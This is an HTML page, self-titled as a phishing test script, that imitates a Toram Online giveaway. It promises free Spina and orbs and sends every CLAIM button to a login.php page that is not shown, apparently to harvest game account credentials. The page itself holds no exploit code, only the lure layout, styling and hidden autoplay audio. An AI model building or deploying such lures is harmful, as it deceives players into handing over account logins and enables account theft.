<!DOCTYPE html>
	<!-- Coded by SwipeMoon. -->
	<html>
		<head>
			<title>Test script phising</title>
			<meta name="description" content="Tes sc phising">
				<meta name="keyword" content="Toram Online, Toram, Spina, Free spina, free orb">
			<link href="https://fonts.googleapis.com/css2?family=League+Gothic" rel="stylesheet">
          <link href="https://fonts.googleapis.com/css2?family=Staatliches" rel="stylesheet">
<body>
	         <script src="https://cdn.rawgit.com/bungfrangki/efeksalju/2a7805c7/efek-salju.js" type="text/javascript"></script>
         <center> 
         <div class="imgtop">
         <img src="image/toram-logo.png" width="420"></center>
      </div>                      
            <center>
            	<br>
          <div class="top">
            <marquee behavior="alternate" scrollamount="25">CHOOSE YOUR REWARD</marquee>
		 </div>
		  </center>
		          <br><br>
			<center>
			<div class="first">
          <img src="image/spina2.jpg" width="400" height="400">
          <br>
          	</div>
          </center>
              <center>
          <div class="firstlink">
          	<a href="login.php" style="text-decoration:none;">CLAIM</a>
                   </div>
 </center>
              	<br><br>
              	<center>
             <div class="second">
          <img src="image/orb.jpg" width="400" height="400">
          <br>
          	</div>
          </center>
              <center>
          <div class="secondlink">
          	<a href="login.php" style="text-decoration:none;">CLAIM</a>
                   </div>
             <audio autoplay="true" hidden="true" loop="true">
             	<source src="bgm/bgm.mp3">
             </audio>
             	
</body>
</head>
         <style>
              .top {
         	font-family: Staatliches;
         	color: #FA8072;
             font-size: 87px;
             border: 15px solid #FA8072;
             padding-top: 25px;
             background-color: #000000;
              }
              body {
              	background-image: url(image/bg.jpg);
                  background-size: cover;
                  -webkit-background-size: cover;
                  -moz-background-size: cover;
                  background-repeat: no-repeat;
                  background-position: center;
                  background-attachment: fixed;
                  -o-background-size: cover;
                  }
                  .first {
                        display: inline-block;
                   	 border: 22px solid #FA8072;
                        border-radius: 30px; 
                    }
                    a {
                    	color: rgb(250, 128, 114);
                    }
                  .firstlink {
                  	margin-top: 10px;
                  	font-size: 120px;
                      border-radius: 30px;
                      background-color: #000000;
                      padding-right: 85px;
                      padding-left: 85px;
                      font-family: League Gothic;
                      border: 15px solid #FA8072;
                      display: inline-block;
                   }
                   .second {
                        display: inline-block;
                        margin-top: 5px;
                   	 border: 22px solid #FA8072;
                        border-radius: 30px; 
                    }
                    .secondlink {
                  	margin-top: 10px;
                  	font-size: 120px;
                      border-radius: 30px;
                      background-color: #000000;
                      padding-right: 85px;
                      padding-left: 85px;
                      font-family: League Gothic;
                      border: 15px solid #FA8072;
                      display: inline-block;
                   }
         </style>
</html>